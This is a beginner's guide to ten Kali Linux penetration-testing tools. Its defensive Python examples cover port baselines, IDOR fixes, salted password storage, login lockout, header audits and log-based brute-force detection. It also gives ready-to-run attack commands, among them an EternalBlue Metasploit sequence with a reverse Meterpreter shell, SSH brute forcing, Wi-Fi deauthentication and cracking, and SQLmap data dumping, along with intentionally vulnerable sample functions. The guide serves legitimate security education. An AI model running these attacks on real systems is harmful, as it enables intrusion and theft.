Kali Linux Tools for Beginners: 10 Essential Hacking Tools Explained
Kali Linux ships with over 600 security tools, and that sheer volume can be paralyzing for anyone just getting started. The good news is that professional penetration testers rely on a surprisingly small core set of tools for the vast majority of their work. Master these ten, and you will have the foundation to handle real-world security assessments, participate in Capture the Flag competitions, and begin building a career in ethical hacking.
Before diving in, a critical point: every tool described in this guide is legal to install and learn, but using any of them against systems you do not own or have explicit written authorization to test is a criminal offense in virtually every jurisdiction. Always practice on purpose-built lab environments like HackTheBox, TryHackMe, or your own isolated virtual machines. Authorization is not optional -- it is the line between ethical hacking and a felony.
1. Nmap -- The Network Scanner
Nmap (Network Mapper) is the first tool most penetration testers reach for at the start of an engagement. It discovers live hosts on a network, identifies open ports, determines what services are running on those ports, and can even fingerprint operating systems. If you learn only one tool from this list, make it Nmap.
What it does: Nmap sends specially crafted packets to target hosts and analyzes the responses to build a detailed picture of the network. It supports dozens of scan types, from stealthy SYN scans to comprehensive version detection.
Basic usage example:
nmap -sV -O -oN scan_results.txt 192.168.1.0/24
This command performs a service version scan (-sV) and OS detection (-O) against an entire subnet, saving the results to a text file. For a quicker initial sweep, nmap -sn 192.168.1.0/24 performs a simple ping scan to identify which hosts are alive.
When to use it: At the very beginning of any engagement, during the reconnaissance and enumeration phases. Nmap is also invaluable for verifying firewall rules, checking whether patches have closed previously open ports, and scripting automated checks with its built-in Nmap Scripting Engine (NSE).
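The "verifying firewall rules" and "checking whether patches have closed previously open ports" use cases come down to comparing a scan against what should be open. The script below is an added example for this guide, not part of Nmap: it parses Nmap's grepable output format (written with -oG instead of -oN) and diffs it against a per-host baseline. The scan text and the baseline are constructed samples.

```python
"""Compare an Nmap grepable (-oG) scan against an allowed-ports baseline.

Added example for this guide; it is not part of Nmap. The scan text below is
hand-written to match the -oG format, and the baseline is hypothetical.
"""
import re
from collections import defaultdict

# Constructed sample of what `nmap -sV -oG scan.gnmap 192.168.1.0/24` would write.
# Each port entry is port/state/protocol/owner/service/rpc-info/version/.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sV -oG scan.gnmap 192.168.1.0/24
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 80/open/tcp//http//nginx 1.18/, 3306/open/tcp//mysql//MySQL 8.0/\tIgnored State: closed (997)
Host: 192.168.1.11 ()\tStatus: Up
Host: 192.168.1.11 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 443/filtered/tcp//https///\tIgnored State: closed (998)
# Nmap done at Mon Jan  1 10:02:13 2024 -- 256 IP addresses (2 hosts up) scanned in 133.20 seconds
"""

# Hypothetical baseline: the only TCP ports that should be reachable on each host.
BASELINE = {
    "192.168.1.10": {22, 80},
    "192.168.1.11": {22, 443},
}

PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_gnmap(text):
    """Return {host: {port: (state, service, version)}} from every 'Ports:' line."""
    hosts = defaultdict(dict)
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service, version in PORT_RE.findall(ports_field):
            if proto == "tcp":
                hosts[host][int(port)] = (state, service, version.strip())
    return dict(hosts)


def diff_against_baseline(scan, baseline):
    """For each baselined host: open ports not in the baseline, and baseline ports no longer open."""
    findings = {}
    for host, allowed in baseline.items():
        open_ports = {p for p, (state, _, _) in scan.get(host, {}).items() if state == "open"}
        findings[host] = {
            "unexpected": sorted(open_ports - allowed),
            "closed": sorted(allowed - open_ports),
        }
    return findings


if __name__ == "__main__":
    for host, result in diff_against_baseline(parse_gnmap(SAMPLE_GNMAP), BASELINE).items():
        print(host, result)
```

Run against a real file, read the -oG output from disk instead of SAMPLE_GNMAP; a port in "unexpected" is a firewall or patching gap to chase, and a port in "closed" confirms a fix landed (or that a service is down).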
2. Wireshark -- The Packet Analyzer
Wireshark captures and displays network traffic at the packet level, giving you a granular view of exactly what is happening on the wire. It is indispensable for understanding protocols, debugging network issues, and analyzing suspicious traffic.
What it does: Wireshark places your network interface into promiscuous mode and captures every packet it sees. You can then filter, search, and reconstruct entire conversations between hosts. It decodes hundreds of protocols automatically, presenting the data in a readable, hierarchical format.
Basic usage example:
Open Wireshark, select your network interface, and start capturing. To filter for HTTP traffic, type http in the display filter bar. To see only traffic to or from a specific host, use ip.addr == 192.168.1.100. To isolate TCP handshakes, try tcp.flags.syn == 1.
When to use it: During network analysis, when you need to verify what data is actually being transmitted (for example, checking whether credentials are sent in plain text), when troubleshooting connectivity issues during a test, or when analyzing a packet capture file provided by a client. Wireshark is also an exceptional learning tool -- capturing traffic while you use other tools helps you understand exactly what those tools are doing under the hood.
3. Burp Suite -- The Web Application Testing Platform
Burp Suite is the industry standard for web application security testing. Its intercepting proxy sits between your browser and the target application, allowing you to inspect, modify, and replay every HTTP request and response.
What it does: At its core, Burp Suite acts as a man-in-the-middle proxy. You configure your browser to route traffic through Burp, and it captures every request. From there, you can manually modify parameters, cookies, and headers before forwarding them to the server. The Community Edition (free) includes the proxy, repeater, decoder, and comparer tools. The Professional Edition adds an automated vulnerability scanner, the intruder tool for fuzzing, and numerous other features.
Basic usage example:
- Start Burp Suite and navigate to the Proxy tab.
- Configure your browser to use 127.0.0.1:8080 as its HTTP proxy.
- Browse the target application. Each request appears in the HTTP history.
- Right-click a request and send it to Repeater to modify and resend it manually.
- Alter parameters -- for example, change a user ID in a request to see if you can access another user's data.
When to use it: For any web application testing engagement. Burp Suite is your primary workspace for testing authentication, authorization, input validation, session management, and business logic flaws. It is also essential for testing APIs.
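The "change a user ID in a request" step above is a test for insecure direct object references. The following is an added example for this guide, not code from Burp Suite or from any real application: a vulnerable lookup that trusts the client-supplied id, the fixed lookup that checks ownership against the server-side session, and a small function that replays the Repeater test against either. The order records and user names are constructed stand-ins.

```python
"""Vulnerable versus fixed object lookup for the 'change the user ID' test.

Added example for this guide, not code from Burp Suite or any real application.
ORDERS and the user names are constructed in-memory stand-ins.
"""

# Constructed data: orders keyed by id, each tagged with the owning user.
ORDERS = {
    1001: {"owner": "alice", "total": 42.00},
    1002: {"owner": "bob", "total": 17.50},
}


class Forbidden(Exception):
    """Raised when the caller may not see the requested object."""


def get_order_vulnerable(session_user, order_id):
    """Trusts the client-supplied id alone: any logged-in user can read any order.

    This is the insecure direct object reference (IDOR) that the Repeater test
    finds by editing the id in a captured request.
    """
    return ORDERS[order_id]


def get_order_fixed(session_user, order_id):
    """Looks the object up, then checks ownership against the server-side session user."""
    order = ORDERS.get(order_id)
    if order is None or order["owner"] != session_user:
        # Same response for 'missing' and 'not yours', so ids cannot be enumerated
        # by telling a 403 apart from a 404.
        raise Forbidden("order not accessible")
    return order


def idor_check(handler, session_user, own_id, other_id):
    """Replay what a tester does in Repeater: fetch your own object, then someone else's.

    Returns True when the handler leaks the other user's object.
    """
    handler(session_user, own_id)  # must succeed for the legitimate owner
    try:
        handler(session_user, other_id)
    except (Forbidden, KeyError):
        return False
    return True


if __name__ == "__main__":
    print("vulnerable leaks:", idor_check(get_order_vulnerable, "alice", 1001, 1002))
    print("fixed leaks:     ", idor_check(get_order_fixed, "alice", 1001, 1002))
```

The fix is the ownership comparison, not hiding or obfuscating the id: a predictable integer id is fine as long as every read and write checks that the session's user is allowed to touch that object.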
4. Metasploit Framework -- The Exploitation Platform
Metasploit Framework is an open-source exploitation platform maintained by Rapid7. It provides a massive library of exploits, payloads, encoders, and auxiliary modules that automate many aspects of penetration testing.
What it does: Metasploit allows you to select an exploit targeting a specific vulnerability, pair it with a payload (the code you want to execute on the target), configure options like target IP and port, and launch the attack. If successful, you get a session (often a Meterpreter shell) on the target machine, giving you extensive post-exploitation capabilities.
Basic usage example:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit
This sequence launches the EternalBlue exploit against a target, using a reverse Meterpreter shell as the payload. In practice, you would only use this against a machine you have permission to test and that you have confirmed is vulnerable.
When to use it: During the exploitation phase of a penetration test, after enumeration has identified potential vulnerabilities. Metasploit is also excellent for learning because it provides context about each exploit, including the CVE number, affected versions, and reliability rating.
5. John the Ripper -- The Password Cracker
John the Ripper is a fast, flexible password cracking tool that supports hundreds of hash formats. It is used to test the strength of passwords by attempting to recover plaintext passwords from their hashed representations.
What it does: John takes a file containing password hashes and applies various cracking techniques: dictionary attacks (trying words from a wordlist), rule-based attacks (applying transformations like appending numbers or substituting characters), and brute-force attacks (trying every possible combination). It automatically detects many hash formats, though you can specify the format manually for accuracy.
Basic usage example:
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
This command runs a dictionary attack against the hashes in hashes.txt using the popular RockYou wordlist. To see cracked passwords, run john --show hashes.txt.
When to use it: After obtaining password hashes during a penetration test -- for example, by dumping the SAM database on a Windows machine, extracting /etc/shadow on a Linux system, or capturing hashes via a man-in-the-middle attack. Cracking passwords demonstrates the risk of weak password policies and is a standard part of penetration test reports.
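The reason a dictionary attack works so well is that many systems still store fast, unsalted hashes, so one candidate hash can be checked against every stored hash at once. The block below is an added example for this guide, not John the Ripper: a tiny dictionary-plus-rules audit over unsalted MD5 hashes, next to the salted PBKDF2 storage that makes each guess expensive and per-user. The wordlist, rule set and hashes are constructed; the 600,000 iteration count is OWASP's published minimum for PBKDF2-HMAC-SHA256.

```python
"""Why a fast unsalted hash falls to a wordlist, and what a safe password store looks like.

Added example for this guide; it is not John the Ripper. The wordlist, the
rules and the stored hashes are constructed here so it runs offline.
"""
import hashlib
import hmac
import os

# Constructed four-word wordlist standing in for rockyou.txt.
WORDLIST = ["password", "letmein", "summer", "welcome"]

# OWASP's published minimum for PBKDF2-HMAC-SHA256.
PBKDF2_ITERATIONS = 600_000


def apply_rules(word):
    """A handful of rules of the kind John applies: capitalisation and appended digits."""
    for base in (word, word.capitalize()):
        yield base
        yield base + "1"
        yield base + "123"
        yield base + "2024"


def md5_unsalted(password):
    """How many legacy systems stored passwords: fast, unsalted, identical for identical inputs."""
    return hashlib.md5(password.encode()).hexdigest()


def audit_md5_hashes(hashes, wordlist):
    """Dictionary-plus-rules run over unsalted MD5 hashes, as a password-policy audit.

    Returns {hash: recovered_password} for every hash that falls. Because the
    hashes are unsalted, one candidate is checked against every target at once.
    """
    targets = set(hashes)
    recovered = {}
    for word in wordlist:
        for candidate in apply_rules(word):
            digest = md5_unsalted(candidate)
            if digest in targets:
                recovered[digest] = candidate
    return recovered


def store_password(password, iterations=PBKDF2_ITERATIONS):
    """Salted, deliberately slow hash: each guess costs `iterations` HMAC calls, per user."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def verify_password(record, password):
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(digest, record["digest"])


if __name__ == "__main__":
    sample = [md5_unsalted("Summer123"), md5_unsalted("Welcome1")]
    print("recovered from unsalted MD5:", audit_md5_hashes(sample, WORDLIST))
```

The audit function is the report finding; the two storage functions are the remediation. A per-user random salt removes the "one hash check covers every user" shortcut, and the iteration count turns each guess into hundreds of thousands of HMAC calls, which is what makes a rockyou-sized run impractical rather than instant.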
6. Hydra -- The Online Brute-Force Tool
Hydra is an online password attack tool, meaning it attempts to log in to live services by trying different username and password combinations directly against the running service. This is distinct from offline cracking tools like John the Ripper, which work against captured hashes.
What it does: Hydra supports over 50 protocols, including SSH, FTP, HTTP, HTTPS, SMB, RDP, MySQL, PostgreSQL, and many more. It sends actual login attempts to the target service and reports any successful credentials.
Basic usage example:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.50
This command attempts to brute-force the SSH login for the user "admin" on the target host, trying every password in the RockYou wordlist. The -l flag specifies a single username, while -L would specify a file of usernames. Similarly, -p is for a single password and -P for a wordlist.
When to use it: When testing the strength of authentication on network services. Hydra is commonly used to check for default credentials, weak passwords, and the absence of account lockout mechanisms. Be cautious with this tool -- aggressive brute-forcing can lock out legitimate accounts or trigger intrusion detection systems, so coordinate with the system owner.
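What a Hydra run is really probing is whether the service throttles or locks out repeated failures. The class below is an added example for this guide, not part of Hydra or any real service: a login guard that counts failures per account and per source address and refuses further attempts for a lockout window, which is the control whose absence the test reports. The credential store is a constructed stand-in and the clock is injectable so the behaviour can be reproduced.

```python
"""Server-side throttling that makes an online brute-force like the Hydra run above fail.

Added example for this guide, not part of Hydra or any real service. USERS is a
constructed stand-in; the clock is injectable for deterministic testing.
"""
import hmac
import time
from collections import defaultdict

MAX_FAILURES = 5        # failed attempts allowed inside the window
LOCKOUT_SECONDS = 900   # 15 minutes
# Constructed credential store; kept in plaintext only to keep the example short.
USERS = {"admin": "Tr0ub4dor&3"}


class LoginGuard:
    """Counts failures per account and per source address and locks either key out."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock                   # injectable for deterministic tests
        self.failures = defaultdict(list)    # key -> timestamps of recent failures
        self.locked_until = {}               # key -> time the lock expires

    def is_locked(self, key):
        return self.locked_until.get(key, 0) > self.clock()

    def attempt(self, username, password, source_ip):
        """Return 'locked', 'failed' or 'ok'. The lock is checked before the password."""
        now = self.clock()
        keys = (f"user:{username}", f"ip:{source_ip}")
        if any(self.is_locked(k) for k in keys):
            return "locked"
        stored = USERS.get(username)
        if stored is not None and hmac.compare_digest(stored, password):
            for k in keys:
                self.failures[k].clear()
            return "ok"
        for k in keys:
            # Drop failures older than the window, then record this one.
            self.failures[k] = [t for t in self.failures[k] if now - t < LOCKOUT_SECONDS]
            self.failures[k].append(now)
            if len(self.failures[k]) >= MAX_FAILURES:
                self.locked_until[k] = now + LOCKOUT_SECONDS
        return "failed"


if __name__ == "__main__":
    guard = LoginGuard()
    for i in range(6):
        print(i, guard.attempt("admin", f"guess{i}", "192.168.1.10"))
```

Keying on both the account and the source address matters: a per-account lock alone is exactly what lets a tester lock out legitimate users (the side effect the paragraph above warns about), while a per-address lock alone is bypassed by spreading attempts across addresses. Returning "locked" before checking the password also means a correct guess during the window is not confirmed.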
7. Aircrack-ng -- The Wireless Security Toolkit
Aircrack-ng is a suite of tools for auditing wireless networks. It can capture wireless traffic, perform deauthentication attacks, and crack WEP and WPA/WPA2 pre-shared keys.
What it does: The Aircrack-ng suite includes several utilities that work together. airmon-ng puts your wireless adapter into monitor mode. airodump-ng captures wireless frames and displays nearby access points. aireplay-ng injects frames to generate traffic or deauthenticate clients. aircrack-ng itself cracks the captured handshake against a wordlist.
Basic usage example:
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
This sequence puts the wireless adapter into monitor mode, identifies target networks, captures a WPA handshake by deauthenticating a connected client, and then attempts to crack the handshake offline.
When to use it: During wireless security assessments. Organizations hire penetration testers to evaluate the security of their wireless infrastructure, including the strength of their WPA2/WPA3 passphrases, the presence of rogue access points, and the effectiveness of wireless intrusion detection systems. Note that you need a wireless adapter that supports monitor mode and packet injection -- not all adapters do.
8. SQLmap -- The SQL Injection Automator
SQLmap automates the detection and exploitation of SQL injection vulnerabilities in web applications. It can identify the injection point, determine the database management system, extract data, and in some cases gain operating system access.
What it does: SQLmap takes a URL with a potentially vulnerable parameter and systematically tests it using a wide variety of SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band. If it confirms an injection point, it can enumerate databases, tables, columns, and dump data.
Basic usage example:
sqlmap -u "http://target.com/page?id=1" --dbs
This command tests the id parameter for SQL injection and, if successful, enumerates all databases on the server. Adding --tables -D database_name lists the tables in a specific database, and --dump -T table_name -D database_name extracts the data.
When to use it: When testing web applications for SQL injection during authorized penetration tests. SQLmap is most effective after you have manually identified a parameter that looks potentially vulnerable -- for example, a page that throws a database error when you append a single quote to a parameter value. Let manual testing guide your use of automated tools, not the other way around.
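The "append a single quote" check works because concatenated SQL hands the client control of the query text. The block below is an added example for this guide, not SQLmap: an in-memory SQLite table with a query built by string concatenation beside its parameterised replacement, and a probe that runs the single-quote test against either. The table rows are constructed.

```python
"""The single-quote test from the paragraph above, against a vulnerable and a fixed query.

Added example for this guide; it is not SQLmap. Uses an in-memory SQLite
database with constructed rows.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, public INTEGER);
    INSERT INTO pages VALUES (1, 'Welcome', 1), (2, 'Internal notes', 0), (3, 'Pricing', 1);
""")


def fetch_vulnerable(page_id):
    """Builds SQL by string concatenation: the client controls the query text."""
    sql = "SELECT id, title FROM pages WHERE public = 1 AND id = " + page_id
    return conn.execute(sql).fetchall()


def fetch_fixed(page_id):
    """Parameterised query: the value is bound by the driver and never parsed as SQL."""
    return conn.execute(
        "SELECT id, title FROM pages WHERE public = 1 AND id = ?", (page_id,)
    ).fetchall()


def probe(handler, value):
    """Return ('error', message) if the input broke the query, else ('rows', rows)."""
    try:
        return ("rows", handler(value))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    for value in ("1", "1'", "1 OR 1=1"):
        print(repr(value), "vulnerable:", probe(fetch_vulnerable, value))
        print(repr(value), "fixed:     ", probe(fetch_fixed, value))
```

The vulnerable handler shows both symptoms a tester looks for: the single quote produces a database error, and a value that changes the WHERE clause returns the non-public row. The parameterised handler returns the expected row for "1" and simply no rows for either malformed input, because the bound value is compared as data rather than interpreted as SQL.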
9. Nikto -- The Web Server Scanner
Nikto is an open-source web server scanner that checks for dangerous files, outdated server software, version-specific problems, and server configuration issues. It is not stealthy -- it generates a large amount of traffic and is easily detected -- but it is thorough and fast.
What it does: Nikto sends thousands of requests to a web server, checking for known vulnerabilities, default files, insecure configurations, and outdated software versions. It checks for things like exposed admin panels, backup files, directory listing enabled, missing security headers, and known vulnerable CGI scripts.
Basic usage example:
nikto -h http://target.com -o results.html -Format htm
This command scans the target web server and saves the results as an HTML report. You can also target specific ports with -p 8080 or scan HTTPS sites with -ssl.
When to use it: Early in the web application testing phase, as an initial sweep to identify low-hanging fruit and areas that warrant deeper investigation. Nikto is best used alongside more thorough tools like Burp Suite rather than as a replacement. Because it is noisy, discuss its use with the client before running it in production environments.
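Several of the things Nikto reports (missing security headers, version disclosure) can be checked from a single response. The function below is an added example for this guide, not Nikto's own checks: it audits a dictionary of response headers for absent hardening headers, weak values, and version strings in Server and X-Powered-By. The sample headers are constructed to trigger each finding; the header names and recommended values are the standard ones.

```python
"""Audit an HTTP response's headers for misconfigurations of the kind Nikto flags.

Added example for this guide; not Nikto's own checks. SAMPLE_HEADERS is a
constructed response from a hypothetical, poorly configured server.
"""
import re

SAMPLE_HEADERS = {
    "Server": "Apache/2.4.29 (Ubuntu)",
    "X-Powered-By": "PHP/7.2.24",
    "Content-Type": "text/html; charset=UTF-8",
    "Strict-Transport-Security": "max-age=300",
    "X-Frame-Options": "ALLOW-FROM https://example.com",
}

# Headers that should be present on every HTML response, with the risk when absent.
REQUIRED = {
    "Strict-Transport-Security": "missing; clients can be downgraded to plain HTTP",
    "Content-Security-Policy": "missing; inline scripts and foreign origins are unrestricted",
    "X-Content-Type-Options": "missing; browsers may MIME-sniff responses",
    "X-Frame-Options": "missing; the page can be framed (clickjacking)",
}
ONE_YEAR = 31_536_000


def audit_headers(headers):
    """Return a list of (header, finding) tuples; an empty list means nothing to report."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    findings = []
    for name, why in REQUIRED.items():
        if name.lower() not in h:
            findings.append((name, why))
    m = re.search(r"max-age=(\d+)", h.get("strict-transport-security", ""))
    if m and int(m.group(1)) < ONE_YEAR:
        findings.append(("Strict-Transport-Security", f"max-age={m.group(1)} is under one year"))
    xfo = h.get("x-frame-options", "").upper()
    if xfo and xfo not in ("DENY", "SAMEORIGIN"):
        findings.append(("X-Frame-Options", f"'{xfo}' is not DENY or SAMEORIGIN (ALLOW-FROM is obsolete)"))
    xcto = h.get("x-content-type-options", "")
    if xcto and xcto.lower() != "nosniff":
        findings.append(("X-Content-Type-Options", f"'{xcto}' should be nosniff"))
    for name in ("Server", "X-Powered-By"):
        value = h.get(name.lower(), "")
        if re.search(r"\d+\.\d+", value):  # a version number is being disclosed
            findings.append((name, f"discloses software version: {value}"))
    return findings


if __name__ == "__main__":
    for header, finding in audit_headers(SAMPLE_HEADERS):
        print(f"{header}: {finding}")
```

To run it against a live server you own, feed it the headers from a response object (for example `dict(resp.headers)` from any HTTP client); an empty result is the state to aim for before a Nikto scan is scheduled.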
10. Gobuster -- The Directory and File Enumerator
Gobuster brute-forces directories and files on web servers, DNS subdomains, and virtual host names. It helps you discover hidden content that is not linked from the main application but may be accessible and vulnerable.
What it does: Gobuster takes a wordlist of common directory and file names and systematically requests each one from the target server, reporting which paths return valid responses (typically anything other than a 404). This reveals content that attackers might exploit, such as admin panels, configuration files, backup directories, or development endpoints that were never intended to be public.
Basic usage example:
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
This command enumerates directories and files on the target, appending .php, .html, and .txt extensions to each word in the list. The -x flag is important because many interesting files will not be found without the correct extension.
When to use it: During the enumeration phase of web application testing. After identifying a web server with Nmap and running an initial Nikto scan, Gobuster helps you map out the full attack surface by discovering content that is not visible through normal browsing. It is also useful for finding hidden API endpoints, backup files, and administrative interfaces.
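From the server's side, a Gobuster run looks like one address requesting many distinct paths that return 404 in a short time, which is easy to spot in the access log. The script below is an added example for this guide, not part of Gobuster: it parses Combined Log Format lines and raises an alert when one source accumulates a threshold of distinct 404 paths inside a sliding window. The log lines are constructed (one scanning address, one ordinary visitor) and the window and threshold are illustrative.

```python
"""Spot a directory brute-force in a web server's access log.

Added example for this guide, not part of Gobuster. The log lines are constructed
in Combined Log Format; WINDOW_SECONDS and THRESHOLD are illustrative values.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

WINDOW_SECONDS = 10
THRESHOLD = 20  # distinct 404 paths from one source inside the window


def constructed_log():
    """Build a sample log: one address guessing paths, one normal visitor."""
    lines = []
    for i in range(25):
        lines.append(
            f'192.0.2.10 - - [01/Jan/2024:12:00:{i // 3:02d} +0000] '
            f'"GET /guess{i}.php HTTP/1.1" 404 196 "-" "gobuster/3.6"'
        )
    lines.append('198.51.100.7 - - [01/Jan/2024:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"')
    lines.append('198.51.100.7 - - [01/Jan/2024:12:00:04 +0000] "GET /missing.png HTTP/1.1" 404 196 "-" "Mozilla/5.0"')
    return lines


def detect_bruteforce(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {ip: alert} for every source that hits `threshold` distinct 404 paths within `window` seconds."""
    recent = defaultdict(deque)  # ip -> deque of (timestamp, path) for 404s in the window
    alerts = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["status"] != "404":
            continue
        ts = datetime.strptime(m["ts"], TS_FORMAT)
        q = recent[m["ip"]]
        q.append((ts, m["path"]))
        while (ts - q[0][0]).total_seconds() > window:
            q.popleft()
        distinct = {p for _, p in q}
        if len(distinct) >= threshold and m["ip"] not in alerts:
            alerts[m["ip"]] = {
                "first_seen": q[0][0],
                "paths": len(distinct),
                "sample": sorted(distinct)[:3],
            }
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(constructed_log()).items():
        print(ip, alert)
```

Counting distinct paths rather than raw 404s keeps a visitor reloading one broken link out of the alert, and the sliding window means a slow, spread-out scan needs a longer window or a lower threshold to be caught. The same shape of rule is what a WAF or SIEM applies to flag enumeration from the "noisy" tools in this guide.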
Bringing It All Together
These ten tools are not used in isolation -- they form a workflow. A typical penetration test follows a logical progression.
- Reconnaissance and scanning: Use Nmap to discover hosts and services on the network. Use Wireshark to analyze traffic patterns and identify protocols in use.
- Enumeration: Use Gobuster and Nikto to map out web applications. Use Nmap's NSE scripts for deeper service enumeration.
- Vulnerability analysis: Use Burp Suite to probe web applications manually. Use SQLmap to test for injection flaws. Use Nikto results to identify known vulnerabilities.
- Exploitation: Use Metasploit to exploit confirmed vulnerabilities. Use Hydra to test authentication strength. Use Aircrack-ng for wireless assessments.
- Post-exploitation: Use John the Ripper to crack recovered password hashes. Use Metasploit's Meterpreter for privilege escalation and lateral movement.
Each tool fills a specific role, and understanding when and why to use each one is just as important as knowing the syntax.
Legal and Ethical Reminders
It is worth repeating: these tools are powerful, and misusing them carries serious legal consequences. Follow these principles without exception.
- Always obtain written authorization before testing any system. A verbal agreement is not sufficient -- get a signed scope document.
- Stay within scope. If you are authorized to test a web application, do not start scanning the internal network unless that is explicitly included.
- Document everything. Keep detailed logs of every command you run, every scan you perform, and every vulnerability you discover.
- Practice on legal platforms. HackTheBox, TryHackMe, VulnHub, and your own lab environments are the right places to learn. Production systems belonging to others are not.
- Report responsibly. If you discover a vulnerability, report it through proper channels. Never exploit vulnerabilities beyond what is necessary to demonstrate the risk.
Where to Go From Here
The best way to learn these tools is to use them repeatedly in controlled environments. Set up a home lab with virtual machines, work through guided challenges on platforms like TryHackMe, and gradually take on more complex scenarios on HackTheBox. As you gain confidence, consider pursuing certifications like the OSCP, which requires hands-on proficiency with many of these tools.
To learn more, read our free Ethical Hacking textbook -- covering penetration testing from beginner to advanced.